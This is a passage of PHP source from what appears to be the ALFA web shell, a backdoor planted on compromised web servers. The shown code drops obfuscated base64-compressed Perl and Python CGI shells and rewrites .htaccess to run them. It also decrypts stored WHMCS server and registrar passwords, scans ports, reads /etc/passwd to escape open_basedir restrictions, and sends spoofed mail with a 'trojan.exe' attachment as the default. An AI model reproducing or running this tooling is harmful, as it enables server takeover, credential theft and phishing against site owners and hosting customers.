4976 $search_noval_r = in_array($val["opt"], $search_noval);
4977 if(empty($val["value"]) && !$search_noval_r)continue;
4978 if(strstr($val["opt"], "...") || $search_noval_r){
4979 $val["opt"] = str_replace("...", $val["value"], $val["opt"]);
4980 $search .= $col . " " . $val["opt"] . " AND ";
4981 }else{
4982 $search .= $col . " " . $val["opt"] . " '".addslashes($val["value"])."' AND ";
4983 }
4984 }
4985 $search .= "1=1";
4986 $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search;
4987 }
4988 $q_tables = @mysqli_query($conn, $query);
4989 if(!$q_tables){
4990 echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));
4991 return false;
4992 }
4993 $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($db["db"])."' AND TABLE_NAME = '".@addslashes($db["table"])."' AND COLUMN_KEY = 'PRI'");
4994 if($col_key){
4995 $col_key = @mysqli_fetch_row($col_key);
4996 $col_key = $col_key[0];
4997 if(!empty($col_key)){
4998 $tbl_content = '<div style="margin-bottom:5px;margin-top:5px;"><button col_key="'.$col_key.'" tbl_name="'.$db["table"].'" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
4999 }
5000 }else{
5001 $col_key = false;
5002 }
5003 while($item = @mysqli_fetch_assoc($q_tables)){
5004 if(!$title){
5005 $tbl_content .= '<tr style="background-color:#305b8e;">';
5006 if($col_key){
5007 $tbl_content .= '<th style="width: 55px;text-align:center;"><input db_id="'.$db["db_id"].'" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>';
5008 }
5009 foreach($item as $key => $value){
5010 $tbl_content .= '<th>'.$key.'</th>';
5011 }
5012 reset($item);
5013 $title=true;
5014 $tbl_content .= '</tr><tr>';
5015 }
5016
5017 if($col_key){
5018 $cacheMsg = '<td style="text-align:center;"><input row_id="'.$line.'" type="checkbox" name="tbl_rows_checkbox[]" value="'.$item[$col_key].'"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" onclick="alfaMysqlEditRow(this, \'edit\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" row_id="'.$line.'" onclick="alfaMysqlEditRow(this, \'delete\');" style="color:#ff1e1e;">Delete</a></td>';
5019 }
5020 $tbl_content .= '<tr class="tbl_row tbl_row_l'.$line.'">'.$cacheMsg;
5021 $line++;
5022 foreach($item as $key => $value){
5023 if($value == null){
5024 $tbl_content .= '<td><i>null</i></td>';
5025 }else{
5026 $tbl_content .= '<td>'.nl2br(htmlspecialchars($value)).'</td>';
5027 }
5028 }
5029 $tbl_content .= '</tr>';
5030 }
5031 $tbl_content .= '</table>';
5032 if(!$title){
5033 $tbl_content = "<div style='padding:5px;border:1px dashed;margin:10px;'>Table is empty...</div>";
5034 }
5035 echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));
5036 }
5037 @mysqli_close($conn);
5038 }
5039}
5040function alfaselfrm(){
5041if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
5042echo(__pre().'<center>');
5043if(@unlink($GLOBALS['__file_path'])){
5044echo('<b>Shell has been removed</i> :)</b>');
5045}else{
5046echo 'unlink error!';
5047}
5048echo('</center>');
5049}
5050if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
5051echo "<div class=header>";
5052echo "
5053<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
5054echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
5055echo '</p></center></div>';
5056}
5057}
5058function alfacgishell(){
5059alfahead();
5060$div = "";
5061alfaCreateParentFolder();
5062@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
5063if(!in_array($_POST['alfa1'],array('perl','py'))){
5064$div = "</div>";
5065echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
5066}
5067if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
5068@mkdir('cgialfa',0755);
5069@chdir('cgialfa');
5070alfacgihtaccess('cgi');
5071$name = $_POST['alfa1'].'.alfa';
5072$perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
5073$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5074if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
5075if(__write_file($name,$code)){
5076@chmod($name,0755);
5077echo '<iframe src="'.__ALFA_DATA_FOLDER__.'/cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
5078}
5079}
5080echo $div;
5081alfafooter();
5082}
5083function alfaWhmcs(){
5084alfahead();
5085echo '<div class=header>';
5086function decrypt($string,$cc_encryption_hash){
5087$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
5088$hash_key = _hash($key);
5089$hash_length = strlen ($hash_key);
5090$string = __ZGVjb2Rlcg($string);
5091$tmp_iv = substr ($string, 0, $hash_length);
5092$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
5093$iv = $out = '';
5094$c = 0;
5095while ($c < $hash_length)
5096{
5097$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
5098++$c;
5099}
5100$key = $iv;
5101$c = 0;
5102while ($c < strlen ($string))
5103{
5104if (($c != 0 AND $c % $hash_length == 0))
5105{
5106$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
5107}
5108$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
5109++$c;
5110}
5111return $out;
5112}
5113function _hash($string)
5114{
5115if(function_exists('sha1'))
5116{
5117$hash = sha1 ($string);
5118}
5119else
5120{
5121$hash = md5 ($string);
5122}
5123$out = '';
5124$c = 0;
5125while ($c < strlen ($hash))
5126{
5127$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
5128$c += 2;
5129}
5130return $out;
5131}
5132AlfaNum(8,9,10);
5133echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
5134<input type='hidden' name='form_action' value='2'>";
5135$table = array('td1' =>
5136 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
5137 'td2' =>
5138 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
5139 'td3' =>
5140 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
5141 'td4' =>
5142 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
5143 'td5' =>
5144 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
5145);
5146create_table($table);
5147echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
5148if($_POST['alfa5']!=''){
5149$db_host=($_POST['alfa7']);
5150$db_username=($_POST['alfa3']);
5151$db_password=($_POST['alfa4']);
5152$db_name=($_POST['alfa5']);
5153$cc_encryption_hash=($_POST['alfa6']);
5154echo __pre();
5155$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
5156$query = mysqli_query($conn,"SELECT * FROM tblservers");
5157$num = mysqli_num_rows($query);
5158if ($num > 0){
5159for($i=0; $i <=$num-1; $i++){
5160$v = @mysqli_fetch_array($query);
5161$ipaddress = $v['ipaddress'];
5162$username = $v['username'];
5163$type = $v['type'];
5164$active = $v['active'];
5165$hostname = $v['hostname'];
5166echo("<center><table border='1'>");
5167$password = decrypt ($v['password'], $cc_encryption_hash);
5168echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
5169echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
5170echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
5171echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
5172echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
5173echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
5174echo "</table><br><br></center>";
5175}
5176$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
5177$num1 = @mysqli_num_rows($query1);
5178if ($num1 > 0){
5179for($i=0; $i <=$num1 -1; $i++){
5180$v = mysqli_fetch_array($query1);
5181$registrar = $v['registrar'];
5182$setting = $v['setting'];
5183$value = decrypt($v['value'], $cc_encryption_hash);
5184if ($value==""){
5185$value=0;
5186}
5187echo("<center>Domain Reseller <br><center>");
5188echo("<center><table border='1'>");
5189echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
5190echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
5191echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
5192echo "</table><br><br></center>";
5193}
5194}
5195}else{__alert('<font color="red">tblservers is Empty...!</font>');};
5196}
5197echo "</div>";
5198alfafooter();
5199}
5200function alfaportscanner(){
5201alfahead();
5202echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
5203<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
5204<input type="hidden" name="y" value="phptools">
5205<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
5206<div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
5207<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
5208</form></center><br>';
5209$start = strip_tags($_POST['alfa2']);
5210$end = strip_tags($_POST['alfa3']);
5211$host = strip_tags($_POST['alfa4']);
5212if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
5213echo __pre();
5214$packetContent = "GET / HTTP/1.1\r\n\r\n";
5215if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
5216else{
5217$packetContent = str_replace(array("\r","\n"), "", $packetContent);
5218$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
5219}
5220for($i = $start; $i<=$end; $i++){
5221$sock = @fsockopen($host, $i, $errno, $errstr, 3);
5222if($sock){
5223stream_set_timeout($sock, 5);
5224fwrite($sock, $packetContent."\r\n\r\n\x00");
5225$counter = 0;
5226$maxtry = 1;
5227$bin = "";
5228do{
5229$line = fgets($sock, 1024);
5230if(trim($line)=="")$counter++;
5231$bin .= $line;
5232}while($counter<$maxtry);
5233fclose($sock);
5234echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
5235echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
5236}
5237flush();
5238}
5239}
5240echo '</div>';
5241alfafooter();
5242}
5243function alfacgihtaccess($m,$d='', $symname=false){
5244$readme = "";
5245if($symname){$readme="\nReadmeName ".trim($symname);}
5246if($m=='cgi'){
5247$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
5248}elseif($m=='sym'){
5249$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
5250}elseif($m=='shtml'){
5251$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
5252}
5253@__write_file($d . ".htaccess", $code);
5254}
5255function alfabasedir(){
5256alfahead();
5257echo '<div class=header>
5258<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
5259$passwd = _alfa_file('/etc/passwd');
5260if(is_array($passwd)){
5261$users = array();
5262$makepwd = alfaMakePwd();
5263$basedir = @ini_get('open_basedir');
5264$safe_mode = @ini_get('safe_mode');
5265if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
5266$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
5267$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);
5268$bash_users = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
5269$users = json_decode($bash_users, true);
5270$x=count($users);
5271if($x>=2){array_pop($users);--$x;}
5272}
5273if(!$basedir&&!$safe_mode){
5274$x=0;
5275foreach($passwd as $str){
5276$pos = strpos($str,':');
5277$username = substr($str,0,$pos);
5278$dirz = str_replace("{user}", $username, $makepwd);
5279if(($username != '')){
5280if (@is_readable($dirz)){
5281array_push($users,$username);
5282$x++;
5283}}}
5284}
5285echo '<br><br>';
5286echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
5287echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
5288echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
5289foreach($users as $user){
5290if(empty($user))continue;
5291$path = str_replace("{user}", $user, $makepwd);
5292echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
5293}
5294}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
5295echo '<br><br></b>';
5296echo '</div>';
5297alfafooter();
5298}
5299function alfamail(){
5300alfahead();
5301echo '<div class=header>';
5302AlfaNum(8,9,10);
5303echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
5304$table = array(
5305'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
5306'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
5307'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
5308'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
5309'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
5310);
5311create_table($table);
5312echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
5313if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
5314$mail_to = $_POST['alfa1'];
5315$mail_from = $_POST['alfa2'];
5316$mail_subject = $_POST['alfa3'];
5317$mail_content = $_POST['alfa5'];
5318$count_mail = (int)$_POST['alfa6'];
5319$mail_attach = $_POST['alfa7'];
5320if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
